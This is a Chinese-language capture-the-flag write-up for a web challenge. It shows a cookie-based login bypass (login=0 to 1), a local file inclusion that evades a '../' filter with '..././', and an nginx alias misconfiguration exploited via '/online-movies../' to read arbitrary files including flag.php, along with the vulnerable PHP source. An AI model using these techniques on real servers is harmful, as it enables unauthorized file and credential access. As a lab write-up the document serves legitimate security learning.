题目内容:网站要上线了,还没测试呢,怎么办?
打开网站只有一个登录框,随便输入登陆一下,提示网站正在建设中
使用dirsearch扫描网站,发现robots.txt
User-agent: *Disallow: /flag.php
但是flag.php中只有一个flag_is_here
接着使用burpsuit抓包,发现请求的cookie中有一项login=0,将值改为1之后,成功登录进去。(不能在login.php页面更改,要在首页更改)
看到有个manage,点进去试试
发现上面的地址变为
http://ec34bcd4403e4e18a9d284df3a33df3cdc36baafb87d444a.changame.ichunqiu.com/manages/admin.php?module=index&name=php
module是index,name是php,看起来任意文件包含漏洞,试试读取flag.php,结果还是一样,只有flag_is_here
尝试使用伪协议,
GET /manages/admin.php?module=php://input&name= HTTP/1.1<?php phpinfo(); ?>
依旧什么都没发生
后来看了wp才知道,还有nginx的漏洞可以用。。。
首先读取nginx的配置文件,但是程序将../过滤掉了,所以要使用..././。
#user nobody;worker_processes 1;#error_log logs/error.log;#error_log logs/error.log notice;#error_log logs/error.log info;#pid run/nginx.pid;events {worker_connections 1024;}http {include mime.types;default_type application/octet-stream;#log_format main '$remote_addr - $remote_user [$time_local] "$request" '# '$status $body_bytes_sent "$http_referer" '# '"$http_user_agent" "$http_x_forwarded_for"';#access_log logs/access.log main;sendfile on;#tcp_nopush on;#keepalive_timeout 0;keepalive_timeout 65;#gzip on;#server {# listen 80;# server_name localhost;#charset koi8-r;#access_log logs/host.access.log main;# location / {# root html;# index index.html index.htm;# }#error_page 404 /404.html;# redirect server error pages to the static page /50x.html## error_page 500 502 503 504 /50x.html;# location = /50x.html {# root html;# }# proxy the PHP scripts to Apache listening on 127.0.0.1:80##location ~ \.php$ {# proxy_pass http://127.0.0.1;#}# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000##location ~ \.php$ {# root html;# fastcgi_pass 127.0.0.1:9000;# fastcgi_index index.php;# fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;# include fastcgi_params;#}# deny access to .htaccess files, if Apache's document root# concurs with nginx's one##location ~ /\.ht {# deny all;#}#}# another virtual host using mix of IP-, name-, and port-based configuration##server {# listen 8000;# listen somename:8080;# server_name somename alias another.alias;# location / {# root html;# index index.html index.htm;# }#}# HTTPS server##server {# listen 443 ssl;# server_name localhost;# ssl_certificate cert.pem;# ssl_certificate_key cert.key;# ssl_session_cache shared:SSL:1m;# ssl_session_timeout 5m;# ssl_ciphers HIGH:!aNULL:!MD5;# ssl_prefer_server_ciphers on;# location / {# root html;# index index.html index.htm;# }#}include sites-enabled/default;}
乍一看没什么问题,但是最后又include了一个文件,继续查看
server {listen 80 default_server;listen [::]:80 default_server ipv6only=on;root /var/www/html;index index.php index.html index.htm;server_name localhost;location / {try_files $uri $uri/ =404;location ~ \.php$ {fastcgi_split_path_info ^(.+\.php)(/.+)$;fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;#fastcgi_pass unix:/var/run/php5-fpm.sock;fastcgi_pass 127.0.0.1:9000;fastcgi_index index.php;include fastcgi_params;}}error_page 404 /404.html;error_page 500 502 503 504 /50x.html;location = /50x.html {root /var/www/html;}location /online-movies {alias /movie/;autoindex on;}location ~ /\.ht {deny all;}}
可以看到
location /online-movies {alias /movie/;autoindex on;}
/online-movies后没有加上/,并且有autoindex on,那么访问/online-movies../就变成了/movie/../,然后就可以读取任意文件了。
payload
/online-movies../var/www/html/flag.php
题目源码解析
读取一下admin.php看看
<?phpheader("content-text:text/html;charset=gbk");if(!isset($_COOKIE['login']))setcookie("login", "0");if( !isset($_COOKIE['login']) || $_COOKIE['login'] !== '1')die("<script>alert('You need to log in!');location.href='/login.php';</script>");if (!isset($_GET['module']) || !isset($_GET['name']))header("Location: admin.php?module=index&name=php");?><?php$ext = $_GET['name'];if ($ext === 'php') {$ext = ".".$ext;}else{$ext = '';}include "/var/www/html/".str_replace("../","",$_GET['module']).$ext;?>
login这一部分就不用说了,重点在下面的include部分。
因为是采用的字符串拼接,所以不能使用伪协议,而后面的str_replace部分,是将../替换为空字符串,所以才要使用..././的形式,将中间的../替换之后,得到的结果正好是../。
至于为什么知道是nginx,从404页面就可以知道,也可以通过读取/etc/passwd。
若有收获,就点个赞吧
0 人点赞
